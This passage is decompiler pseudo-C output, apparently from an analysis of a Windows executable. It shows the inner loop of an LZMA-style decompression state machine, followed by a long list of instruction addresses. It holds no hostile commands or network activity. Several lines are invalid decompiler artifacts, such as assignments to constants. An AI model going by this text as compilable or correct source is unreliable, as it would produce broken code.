													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406eaf
                                                                                                                                                                                                  0x00406eaf
                                                                                                                                                                                                  0x00406eb3
                                                                                                                                                                                                  0x00406ec0
                                                                                                                                                                                                  0x00406eca
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406eb5
                                                                                                                                                                                                  0x00406eb5
                                                                                                                                                                                                  0x00406ef0
                                                                                                                                                                                                  0x00406ef3
                                                                                                                                                                                                  0x00406ef6
                                                                                                                                                                                                  0x00406ef9
                                                                                                                                                                                                  0x00406ef9
                                                                                                                                                                                                  0x00406efc
                                                                                                                                                                                                  0x00406f03
                                                                                                                                                                                                  0x00406f08
                                                                                                                                                                                                  0x00406de9
                                                                                                                                                                                                  0x00406dec
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x00407161
                                                                                                                                                                                                  0x00407161
                                                                                                                                                                                                  0x00407161
                                                                                                                                                                                                  0x00407167
                                                                                                                                                                                                  0x0040716d
                                                                                                                                                                                                  0x00407173
                                                                                                                                                                                                  0x0040718d
                                                                                                                                                                                                  0x00407190
                                                                                                                                                                                                  0x00407196
                                                                                                                                                                                                  0x004071a1
                                                                                                                                                                                                  0x004071a3
                                                                                                                                                                                                  0x00407175
                                                                                                                                                                                                  0x00407175
                                                                                                                                                                                                  0x00407184
                                                                                                                                                                                                  0x00407188
                                                                                                                                                                                                  0x00407188
                                                                                                                                                                                                  0x004071ad
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004071af
                                                                                                                                                                                                  0x004071b3
                                                                                                                                                                                                  0x00407362
                                                                                                                                                                                                  0x00407378
                                                                                                                                                                                                  0x00407380
                                                                                                                                                                                                  0x00407387
                                                                                                                                                                                                  0x00407389
                                                                                                                                                                                                  0x00407390
                                                                                                                                                                                                  0x00407394
                                                                                                                                                                                                  0x00407394
                                                                                                                                                                                                  0x004071bf
                                                                                                                                                                                                  0x004071c6
                                                                                                                                                                                                  0x004071ce
                                                                                                                                                                                                  0x004071d1
                                                                                                                                                                                                  0x004071d4
                                                                                                                                                                                                  0x004071d4
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00406976
                                                                                                                                                                                                  0x00406976
                                                                                                                                                                                                  0x00406976
                                                                                                                                                                                                  0x0040697f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406985
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406990
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406999
                                                                                                                                                                                                  0x0040699c
                                                                                                                                                                                                  0x0040699f
                                                                                                                                                                                                  0x004069a3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004069a9
                                                                                                                                                                                                  0x004069ac
                                                                                                                                                                                                  0x004069ae
                                                                                                                                                                                                  0x004069af
                                                                                                                                                                                                  0x004069b2
                                                                                                                                                                                                  0x004069b4
                                                                                                                                                                                                  0x004069b5
                                                                                                                                                                                                  0x004069b7
                                                                                                                                                                                                  0x004069ba
                                                                                                                                                                                                  0x004069bf
                                                                                                                                                                                                  0x004069c4
                                                                                                                                                                                                  0x004069cd
                                                                                                                                                                                                  0x004069e0
                                                                                                                                                                                                  0x004069e3
                                                                                                                                                                                                  0x004069ef
                                                                                                                                                                                                  0x00406a17
                                                                                                                                                                                                  0x00406a19
                                                                                                                                                                                                  0x00406a27
                                                                                                                                                                                                  0x00406a27
                                                                                                                                                                                                  0x00406a2b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a1b
                                                                                                                                                                                                  0x00406a1b
                                                                                                                                                                                                  0x00406a1e
                                                                                                                                                                                                  0x00406a1f
                                                                                                                                                                                                  0x00406a1f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a1b
                                                                                                                                                                                                  0x004069f5
                                                                                                                                                                                                  0x004069fa
                                                                                                                                                                                                  0x004069fa
                                                                                                                                                                                                  0x00406a03
                                                                                                                                                                                                  0x00406a0b
                                                                                                                                                                                                  0x00406a0e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a14
                                                                                                                                                                                                  0x00406a14
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a14
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a31
                                                                                                                                                                                                  0x00406a31
                                                                                                                                                                                                  0x00406a35
                                                                                                                                                                                                  0x004072e1
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072e1
                                                                                                                                                                                                  0x00406a3e
                                                                                                                                                                                                  0x00406a4e
                                                                                                                                                                                                  0x00406a51
                                                                                                                                                                                                  0x00406a54
                                                                                                                                                                                                  0x00406a54
                                                                                                                                                                                                  0x00406a54
                                                                                                                                                                                                  0x00406a57
                                                                                                                                                                                                  0x00406a5b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a5d
                                                                                                                                                                                                  0x00406a63
                                                                                                                                                                                                  0x00406a8d
                                                                                                                                                                                                  0x00406a93
